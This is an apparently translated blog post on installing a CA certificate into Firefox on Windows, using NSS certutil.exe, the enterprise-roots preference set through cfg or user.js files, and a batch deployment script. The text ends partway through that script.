<h2 id="关于Firefox证书"><a href="#关于Firefox证书" class="headerlink" title="关于Firefox证书"></a>About Firefox certificates</h2><p>Firefox uses its own certificate store, whereas other browsers such as Chrome use the operating system's certificate store.</p><h2 id="主要参考资料"><a href="#主要参考资料" class="headerlink" title="主要参考资料"></a>Main references</h2><p><a href="https://wiki.mozilla.org/CA/AddRootToFirefox">https://wiki.mozilla.org/CA/AddRootToFirefox</a> (the official documentation, and the most complete)</p><p><a href="https://stackoverflow.com/questions/1435000/programmatically-install-certificate-into-mozilla">https://stackoverflow.com/questions/1435000/programmatically-install-certificate-into-mozilla</a></p>
<h2 id="方法1:certutil-exe"><a href="#方法1:certutil-exe" class="headerlink" title="方法1:certutil.exe"></a>Method 1: certutil.exe</h2><p>Use NSS: download the NSS package (the official repository link has been removed and there is no prebuilt version, so it has to be compiled again); NSPR also seems to be required. Then use certutil.exe (this is a different tool from the certutil that ships with Windows).<br>References:<br><a href="https://stackoverflow.com/questions/1435000/programmatically-install-certificate-into-mozilla">https://stackoverflow.com/questions/1435000/programmatically-install-certificate-into-mozilla</a><br><a href="https://stackoverflow.com/questions/50159193/how-to-add-certificate-programmatically-into-firefox-version-59-cannot-find-cer">https://stackoverflow.com/questions/50159193/how-to-add-certificate-programmatically-into-firefox-version-59-cannot-find-cer</a><br>File download locations:<br><a href="https://ftp.mozilla.org/pub/security/nss/releases/NSS_3_13_5_RTM/src/">https://ftp.mozilla.org/pub/security/nss/releases/NSS_3_13_5_RTM/src/</a><br><a href="https://ftp.mozilla.org/pub/nspr/releases/">https://ftp.mozilla.org/pub/nspr/releases/</a></p><p>Build instructions: <a href="https://brpoblog.wordpress.com/2015/10/02/add-certificates-to-firefox-installation-with-certutil/">https://brpoblog.wordpress.com/2015/10/02/add-certificates-to-firefox-installation-with-certutil/</a></p><p>It fails with an error saying MSVCR71.DLL is missing. Download this DLL and put it in the bin folder.<br><a href="https://cn.dll-files.com/download/837b1e310f2aa8b20f07a9b1ce90ac4f/msvcr71.dll.html?c=d3JyZEIva1QwMm1IbFpwVGhQK1kwQT09">https://cn.dll-files.com/download/837b1e310f2aa8b20f07a9b1ce90ac4f/msvcr71.dll.html?c=d3JyZEIva1QwMm1IbFpwVGhQK1kwQT09</a></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">List certificates:</span><br><span class="line"></span><br><span class="line">certutil.exe -L -d "%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\urvqiw6e.default"</span><br><span class="line"></span><br><span class="line">Install the certificate:</span><br><span class="line"></span><br><span class="line">certutil.exe -A -n "SomeNametest" -t "u,u,u" -i D:\UserData\h4m5tdesktop\Fortinet_CA_SSL.cer -d "%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\urvqiw6e.default"</span><br><span class="line"></span><br><span class="line">List again after installing:</span><br><span class="line"></span><br><span class="line">certutil.exe -L -d "%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\urvqiw6e.default"</span><br><span class="line"></span><br><span class="line">It is now in the list.</span><br></pre></td></tr></table></figure><p>Note that <code>-t "u,u,u"</code> only marks the certificate as a user cert. For a CA that Firefox should trust to issue server certificates, the SSL position of the trust string needs <code>C</code>, e.g. <code>-t "C,,"</code> (see the trust attribute list under <code>-A</code> in the help output below); otherwise the certificate is listed but is not trusted for TLS server validation.</p><p>certutil.exe usage:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span 
class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span 
class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span 
class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\h4m5t\Downloads\nss-3.11\nss-3.11\bin>certutil.exe -H</span><br><span class="line">-A Add a certificate to the database (create if needed)</span><br><span class="line">-E Add an Email certificate to the database (create if needed)</span><br><span class="line"> -n cert-name Specify the nickname of the certificate to add</span><br><span class="line"> -t trustargs Set the certificate trust attributes:</span><br><span class="line"> p valid peer</span><br><span class="line"> P trusted peer (implies p)</span><br><span class="line"> c valid CA</span><br><span class="line"> T trusted CA to issue client certs (implies c)</span><br><span class="line"> C trusted CA to issue server certs (implies c)</span><br><span class="line"> u user cert</span><br><span class="line"> w send warning</span><br><span class="line"> g make step-up cert</span><br><span class="line"> -f pwfile Specify the password file</span><br><span class="line"> -d certdir Cert database directory (default is ~/.netscape)</span><br><span class="line"> -P dbprefix Cert & Key database prefix</span><br><span class="line"> -a The input certificate is encoded in ASCII (RFC1113)</span><br><span class="line"> -i input Specify the certificate file (default is stdin)</span><br><span class="line"></span><br><span class="line">-C Create a new binary certificate from a BINARY cert request</span><br><span class="line"> -c issuer-name The nickname of the 
issuer cert</span><br><span class="line"> -i cert-request The BINARY certificate request file</span><br><span class="line"> -o output-cert Output binary cert to this file (default is stdout)</span><br><span class="line"> -x Self sign</span><br><span class="line"> -m serial-number Cert serial number</span><br><span class="line"> -w warp-months Time Warp</span><br><span class="line"> -v months-valid Months valid (default is 3)</span><br><span class="line"> -f pwfile Specify the password file</span><br><span class="line"> -d certdir Cert database directory (default is ~/.netscape)</span><br><span class="line"> -P dbprefix Cert & Key database prefix</span><br><span class="line"> -1 Create key usage extension</span><br><span class="line"> -2 Create basic constraint extension</span><br><span class="line"> -3 Create authority key ID extension</span><br><span class="line"> -4 Create crl distribution point extension</span><br><span class="line"> -5 Create netscape cert type extension</span><br><span class="line"> -6 Create extended key usage extension</span><br><span class="line"> -7 Create an email subject alt name extension</span><br><span class="line"> -8 Create an dns subject alt name extension</span><br><span class="line"></span><br><span class="line">-G Generate a new key pair</span><br><span class="line"> -h token-name Name of token in which to generate key (default is internal)</span><br><span class="line"> -k key-type Type of key pair to generate ("dsa", "rsa" (default))</span><br><span class="line"> -g key-size Key size in bits, (min 512, max 2048, default 1024)</span><br><span class="line"> -y exp Set the public exponent value (3, 17, 65537) (rsa only)</span><br><span class="line"> -f password-file Specify the password file</span><br><span class="line"> -z noisefile Specify the noise file to be used</span><br><span class="line"> -q pqgfile read PQG value from pqgfile (dsa only)</span><br><span class="line"> -d keydir Key database directory (default is 
~/.netscape)</span><br><span class="line"> -P dbprefix Cert & Key database prefix</span><br><span class="line"></span><br><span class="line">-D Delete a certificate from the database</span><br><span class="line"> -n cert-name The nickname of the cert to delete</span><br><span class="line"> -d certdir Cert database directory (default is ~/.netscape)</span><br><span class="line"> -P dbprefix Cert & Key database prefix</span><br><span class="line"></span><br><span class="line">-U List all modules</span><br><span class="line"> -d moddir Module database directory (default is '~/.netscape')</span><br><span class="line"> -P dbprefix Cert & Key database prefix</span><br><span class="line"> -X force the database to open R/W</span><br><span class="line"></span><br><span class="line">-K List all keys</span><br><span class="line"> -h token-name Name of token in which to look for keys (default is internal, use "all" to list keys on all tokens)</span><br><span class="line"> -k key-type Type of key pair to list ("all", "dsa", "rsa" (default))</span><br><span class="line"> -f password-file Specify the password file</span><br><span class="line"> -d keydir Key database directory (default is ~/.netscape)</span><br><span class="line"> -P dbprefix Cert & Key database prefix</span><br><span class="line"> -X force the database to open R/W</span><br><span class="line"></span><br><span class="line">-L List all certs, or print out a single named cert</span><br><span class="line"> -n cert-name Pretty print named cert (list all if unspecified)</span><br><span class="line"> -d certdir Cert database directory (default is ~/.netscape)</span><br><span class="line"> -P dbprefix Cert & Key database prefix</span><br><span class="line"> -X force the database to open R/W</span><br><span class="line"> -r For single cert, print binary DER encoding</span><br><span class="line"> -a For single cert, print ASCII encoding (RFC1113)</span><br><span class="line"></span><br><span class="line">-M Modify trust 
attributes of certificate</span><br><span class="line"> -n cert-name The nickname of the cert to modify</span><br><span class="line"> -t trustargs Set the certificate trust attributes (see -A above)</span><br><span class="line"> -d certdir Cert database directory (default is ~/.netscape)</span><br><span class="line"> -P dbprefix Cert & Key database prefix</span><br><span class="line"></span><br><span class="line">-N Create a new certificate database</span><br><span class="line"> -d certdir Cert database directory (default is ~/.netscape)</span><br><span class="line"> -P dbprefix Cert & Key database prefix</span><br><span class="line"></span><br><span class="line">-T Reset the Key database or token</span><br><span class="line"> -d certdir Cert database directory (default is ~/.netscape)</span><br><span class="line"> -P dbprefix Cert & Key database prefix</span><br><span class="line"> -h token-name Token to reset (default is internal)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">-O Print the chain of a certificate</span><br><span class="line"> -n cert-name The nickname of the cert to modify</span><br><span class="line"> -d certdir Cert database directory (default is ~/.netscape)</span><br><span class="line"> -P dbprefix Cert & Key database prefix</span><br><span class="line"> -X force the database to open R/W</span><br><span class="line"></span><br><span class="line">-R Generate a certificate request (stdout)</span><br><span class="line"> -s subject Specify the subject name (using RFC1485)</span><br><span class="line"> -o output-req Output the cert request to this file</span><br><span class="line"> -k key-type Type of key pair to generate ("dsa", "rsa" (default))</span><br><span class="line"> -h token-name Name of token in which to generate key (default is internal)</span><br><span class="line"> -g key-size Key size in bits, RSA keys only (min 512, max 2048, default 1024)</span><br><span class="line"> -q pqgfile Name of 
file containing PQG parameters (dsa only)</span><br><span class="line"> -f pwfile Specify the password file</span><br><span class="line"> -d keydir Key database directory (default is ~/.netscape)</span><br><span class="line"> -P dbprefix Cert & Key database prefix</span><br><span class="line"> -p phone Specify the contact phone number ("123-456-7890")</span><br><span class="line"> -a Output the cert request in ASCII (RFC1113); default is binary</span><br><span class="line"></span><br><span class="line">-V Validate a certificate</span><br><span class="line"> -n cert-name The nickname of the cert to Validate</span><br><span class="line"> -b time validity time ("YYMMDDHHMMSS[+HHMM|-HHMM|Z]")</span><br><span class="line"> -e Check certificate signature</span><br><span class="line"> -u certusage Specify certificate usage:</span><br><span class="line"> C SSL Client</span><br><span class="line"> V SSL Server</span><br><span class="line"> S Email signer</span><br><span class="line"> R Email Recipient</span><br><span class="line"> -d certdir Cert database directory (default is ~/.netscape)</span><br><span class="line"> -P dbprefix Cert & Key database prefix</span><br><span class="line"> -X force the database to open R/W</span><br><span class="line"></span><br><span class="line">-S Make a certificate and add to database</span><br><span class="line"> -n key-name Specify the nickname of the cert</span><br><span class="line"> -s subject Specify the subject name (using RFC1485)</span><br><span class="line"> -c issuer-name The nickname of the issuer cert</span><br><span class="line"> -t trustargs Set the certificate trust attributes (see -A above)</span><br><span class="line"> -k key-type Type of key pair to generate ("dsa", "rsa" (default))</span><br><span class="line"> -h token-name Name of token in which to generate key (default is internal)</span><br><span class="line"> -g key-size Key size in bits, RSA keys only (min 512, max 2048, default 1024)</span><br><span class="line"> 
-q pqgfile Name of file containing PQG parameters (dsa only)</span><br><span class="line"> -x Self sign</span><br><span class="line"> -m serial-number Cert serial number</span><br><span class="line"> -w warp-months Time Warp</span><br><span class="line"> -v months-valid Months valid (default is 3)</span><br><span class="line"> -f pwfile Specify the password file</span><br><span class="line"> -d certdir Cert database directory (default is ~/.netscape)</span><br><span class="line"> -P dbprefix Cert & Key database prefix</span><br><span class="line"> -p phone Specify the contact phone number ("123-456-7890")</span><br><span class="line"> -1 Create key usage extension</span><br><span class="line"> -2 Create basic constraint extension</span><br><span class="line"> -3 Create authority key ID extension</span><br><span class="line"> -4 Create crl distribution point extension</span><br><span class="line"> -5 Create netscape cert type extension</span><br><span class="line"> -6 Create extended key usage extension</span><br><span class="line"> -7 Create an email subject alt name extension</span><br><span class="line"> -8 Create an dns subject alt name extension</span><br></pre></td></tr></table></figure>
<h2 id="方法2:用GitHub脚本更新cert8-db"><a href="#方法2:用GitHub脚本更新cert8-db" class="headerlink" title="方法2:用GitHub脚本更新cert8.db"></a>Method 2: update cert8.db with a script from GitHub</h2><p>Use <a href="https://github.com/christian-korneck/firefox_add-certs">https://github.com/christian-korneck/firefox_add-certs</a> (The release download includes a build of the NSS certutil.exe.)</p><h2 id="方法3:启用security-enterprise-roots-enabled"><a href="#方法3:启用security-enterprise-roots-enabled" class="headerlink" title="方法3:启用security.enterprise_roots.enabled"></a>Method 3: enable security.enterprise_roots.enabled</h2><p><strong>Applies to Firefox 49 and later</strong></p><p><a href="https://support.mozilla.org/en-US/kb/setting-certificate-authorities-firefox">https://support.mozilla.org/en-US/kb/setting-certificate-authorities-firefox</a></p><p><a href="https://community.fortinet.com/t5/FortiGate/Technical-Note-Differences-between-SSL-Certificate-Inspection/ta-p/192301">https://community.fortinet.com/t5/FortiGate/Technical-Note-Differences-between-SSL-Certificate-Inspection/ta-p/192301</a></p><h3 id="手动启用"><a href="#手动启用" class="headerlink" title="手动启用"></a>Enable manually</h3><p>Change the Firefox configuration manually.</p><p><a href="https://support.umbrella.com/hc/en-us/articles/115000669728-Configuring-Firefox-to-use-the-Windows-Certificate-Store">https://support.umbrella.com/hc/en-us/articles/115000669728-Configuring-Firefox-to-use-the-Windows-Certificate-Store</a></p><p><a href="https://docs.trendmicro.com/all/ent/ddwi/2.5/en-us/ddwi_2.5_olh/Deploy-the-Default-C_001.html">https://docs.trendmicro.com/all/ent/ddwi/2.5/en-us/ddwi_2.5_olh/Deploy-the-Default-C_001.html</a></p><h3 id="cfg配置文件启用"><a href="#cfg配置文件启用" class="headerlink" title="cfg配置文件启用"></a>Enable via a cfg configuration file</h3><p>Create ddwi.cfg with the content below (Firefox ignores the first line of an autoconfig file, so that line is reserved for a comment) and copy it to:</p><p>C:\Program Files\Mozilla Firefox\ddwi.cfg</p><p>C:\Program Files (x86)\Mozilla Firefox\ddwi.cfg</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">// first line is skipped by Firefox, keep it as a comment</span><br><span class="line">lockPref("security.enterprise_roots.enabled", true);</span><br></pre></td></tr></table></figure><p>Create local-settings.js with the content below and copy it to:</p><p>C:\Program Files\Mozilla Firefox\defaults\pref\local-settings.js</p><p>C:\Program Files (x86)\Mozilla Firefox\defaults\pref\local-settings.js</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pref("general.config.obscure_value", 0);</span><br><span class="line">pref("general.config.filename", "ddwi.cfg");</span><br></pre></td></tr></table></figure><p>Note: after enabling the option this way, it sometimes flips back to false after a few minutes and then back to true again a while later. I have not found out why this happens and have not resolved it yet, so I recommend changing the option manually, or using the other method below: editing the user.js configuration file.</p><h3 id="user-js配置文件启用"><a href="#user-js配置文件启用" class="headerlink" title="user.js配置文件启用"></a>Enable via the user.js configuration file</h3><p>References: <a href="http://www.360doc.com/content/19/1031/22/73478_870350348.shtml">http://www.360doc.com/content/19/1031/22/73478_870350348.shtml</a></p><p><a href="https://kb.mozillazine.org/User.js_file">https://kb.mozillazine.org/User.js_file</a></p><p><img src="/2023/06/07/firefox-and-bat/profiles.png" alt="pic"></p><p>Enter about:profiles in the Firefox address bar to find the profile directory; usually there are two profile directories, located under:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%APPDATA%\Mozilla\Firefox\Profiles</span><br></pre></td></tr></table></figure><p>Create a user.js file and copy it into that profile directory.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">user_pref("security.enterprise_roots.enabled", true);</span><br></pre></td></tr></table></figure><p>Restart the browser and the option now shows as true.</p><p><img src="/2023/06/07/firefox-and-bat/config.png" alt="pic"></p><h2 id="安装脚本"><a href="#安装脚本" class="headerlink" title="安装脚本"></a>Install scripts</h2><p>Prepare the certificate file, the configuration files, the certutil.exe built from the NSS library, and the install script. Put them all in the firefoxinstallcert folder in the root of the C: drive.</p><p><strong>Script 2 is recommended</strong></p><h3 id="脚本1"><a href="#脚本1" class="headerlink" title="脚本1"></a>Script 1</h3><p>Enables security.enterprise_roots.enabled via lockPref in the cfg configuration file.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span 
class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span 
class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span 
class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br></pre></td><td class="code"><pre><span class="line">@echo off</span><br><span class="line">::enable delayed variable expansion</span><br><span class="line">setlocal EnableExtensions EnableDelayedExpansion</span><br><span class="line"></span><br><span class="line">echo ###checking new_version###</span><br><span class="line">echo --------------------------</span><br><span class="line">set regPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox"</span><br><span class="line">set regPath2="HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox"</span><br><span class="line">set regKey="CurrentVersion"</span><br><span 
class="line">set regValue=""</span><br><span class="line"></span><br><span class="line">set Value1="checkversion"</span><br><span class="line"></span><br><span class="line">rem check whether the new-version registry key exists</span><br><span class="line">reg query %regPath1% >nul 2>nul</span><br><span class="line">echo %errorlevel%</span><br><span class="line">echo !errorlevel!</span><br><span class="line">if %errorlevel%==0 (</span><br><span class="line"> echo new_version Registry key %regkey% exists.</span><br><span class="line"> for /f "tokens=2*" %%a in ('reg query %regPath1% /v %regKey% ^| findstr /i %regKey%') do (</span><br><span class="line"> if "%%b"=="" (</span><br><span class="line"> echo value not exists</span><br><span class="line"> ) else (</span><br><span class="line"> set Value1=%%b</span><br><span class="line"> ) </span><br><span class="line"> )</span><br><span class="line">) else (</span><br><span class="line"> echo new_version Registry key %regkey% does not exist.</span><br><span class="line"> echo --------------------------</span><br><span class="line"> rem check whether the old-version registry path exists (rem, not ::, is used inside parenthesized blocks because :: is a label and is unsafe there)</span><br><span class="line"> echo ###checking old_version###</span><br><span class="line"> reg query %regPath2% >nul 2>nul</span><br><span class="line"> if !errorlevel!==0 (</span><br><span class="line"> echo old_version Registry key %regkey% exists.</span><br><span class="line"> for /f "tokens=2*" %%a in ('reg query %regPath2% /v %regKey% ^| findstr /i %regKey%') do (</span><br><span class="line"> if "%%b"=="" (</span><br><span class="line"> echo value not exists</span><br><span class="line"> ) else (</span><br><span class="line"> set Value1=%%b</span><br><span class="line"> ) </span><br><span class="line"> )</span><br><span class="line"> ) else (</span><br><span class="line"> echo old_version Registry key %regkey% does not exist.</span><br><span class="line"> set Value1=0.0.0</span><br><span class="line"> )</span><br><span class="line"></span><br><span class="line"> echo !Value1!</span><br><span 
class="line"> echo %Value1%</span><br><span class="line"></span><br><span class="line"> set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%"</span><br><span class="line"> echo Majorold: %Major%</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">echo !Value1!</span><br><span class="line">echo %Value1%</span><br><span class="line"></span><br><span class="line">set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%"</span><br><span class="line">echo Majornew: %Major%</span><br><span class="line"></span><br><span class="line">::show the final version; 0 means Firefox is not installed</span><br><span class="line">echo --------------------------</span><br><span class="line">set final_version= %Major%</span><br><span class="line">echo final_version %final_version%</span><br><span class="line">echo --------------------------</span><br><span class="line"></span><br><span class="line">rem check the version number</span><br><span class="line">if %final_version% EQU 0 (</span><br><span class="line"> echo Program version is 0. Exiting script...</span><br><span class="line"> exit /b 1</span><br><span class="line">) else if %Major% LSS 49 (</span><br><span class="line"> call :function1</span><br><span class="line">) else (</span><br><span class="line"> call :function2</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">rem exit the script</span><br><span class="line">exit /b</span><br><span class="line"></span><br><span class="line">::</span><br><span class="line">:function1</span><br><span class="line">echo Program version is less than 49. Executing function 1...</span><br><span class="line">rem code for function 1: below version 49, update the cert8.db certificate store.</span><br><span class="line"></span><br><span class="line">::show the certificates currently in the db</span><br><span class="line">set "db_path=%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\"</span><br><span class="line">set default_name=""</span><br><span class="line">::check whether the certificate database path exists</span><br><span class="line">IF EXIST "%db_path%" (</span><br><span class="line"> echo default_path exists</span><br><span class="line"> rem add the commands to run here</span><br><span class="line"> set "count=0"</span><br><span class="line"> for /d %%i in ("%db_path%*") do (</span><br><span class="line"> set /a count+=1</span><br><span class="line"> set "folder=%%~nxi"</span><br><span class="line"> )</span><br><span class="line"> rem check that *.default is the only folder</span><br><span class="line"> if !count! equ 1 (</span><br><span class="line"> set default_name=!folder!</span><br><span class="line"> set "all_path=%db_path%!default_name!"</span><br><span class="line"> rem show the full path of the default folder</span><br><span class="line"> echo !all_path!</span><br><span class="line"> rem show the certificate store before the update</span><br><span class="line"> C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d "!all_path!"</span><br><span class="line"> rem update the certificate store (note: the trust flags "u,u,u" mark a user certificate; a CA that should be trusted for TLS server certificates is normally added with "C,,")</span><br><span class="line"> C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -A -n "SomeNametest" -t "u,u,u" -i "C:\firefoxinstallcert\TPLINKCA.cer" -d "!all_path!"</span><br><span class="line"> rem show the certificate store after the update</span><br><span class="line"> C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d "!all_path!"</span><br><span class="line"> ) else (</span><br><span class="line"> echo no or more</span><br><span class="line"> )</span><br><span class="line">) ELSE (</span><br><span class="line"> echo no</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">goto :eof</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">:function2</span><br><span class="line">echo 
Program version is greater than or equal to 49. Executing function 2...</span><br><span class="line">rem code for function 2: on Firefox 49 and above, enable security.enterprise_roots.enabled</span><br><span class="line"></span><br><span class="line">set source_file_cfg=C:\firefoxinstallcert\ddwi.cfg</span><br><span class="line">set "dest_dir_cfg=C:\Program Files\Mozilla Firefox\"</span><br><span class="line">echo Moving %source_file_cfg% to %dest_dir_cfg%...</span><br><span class="line">if exist "%source_file_cfg%" ( </span><br><span class="line"> if exist "%dest_dir_cfg%" (</span><br><span class="line"> copy "%source_file_cfg%" "%dest_dir_cfg%" </span><br><span class="line"> ) else (</span><br><span class="line"> echo Directory %dest_dir_cfg% does not exist! Cannot move file.</span><br><span class="line"> )</span><br><span class="line">) else (</span><br><span class="line"> echo Source file %source_file_cfg% does not exist! Cannot move file. </span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">set "dest_dir_cfg_x86=C:\Program Files (x86)\Mozilla Firefox\"</span><br><span class="line">echo Moving %source_file_cfg% to %dest_dir_cfg_x86%...</span><br><span class="line">if exist "%source_file_cfg%" ( </span><br><span class="line"> if exist "%dest_dir_cfg_x86%" (</span><br><span class="line"> copy "%source_file_cfg%" "%dest_dir_cfg_x86%" </span><br><span class="line"> ) else (</span><br><span class="line"> echo Directory does not exist! Cannot move file.</span><br><span class="line"> )</span><br><span class="line">) else (</span><br><span class="line"> echo Source file %source_file_cfg% does not exist! Cannot move file. 
